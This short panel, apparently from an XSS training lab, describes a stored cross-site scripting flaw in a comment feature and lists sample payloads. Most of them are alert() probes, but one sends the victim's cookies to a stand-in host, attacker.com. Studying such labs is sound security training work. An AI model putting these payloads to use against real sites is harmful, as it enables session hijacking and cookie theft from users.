๐ฏ Vulnerability Info
Type: Stored Cross-Site Scripting (XSS)
Severity: Critical
๐ก How to Exploit
- Comments are stored in database without sanitization
- Displayed to all users without output encoding
- JavaScript executes every time page is loaded
- Can steal cookies, sessions, or perform actions
๐งช Sample Payloads
<script>alert('Stored XSS')</script>
<script>
document.location='http://attacker.com/steal.php?c='+document.cookie
</script>
<img src=x onerror="alert(document.cookie)">
<svg/onload=alert('XSS')>
<body onload="alert('XSS')">
<div onmouseover="alert('XSS')">Hover me</div>
โ ๏ธ Impact
- Session hijacking
- Cookie theft
- Keylogging
- Phishing attacks
- Defacement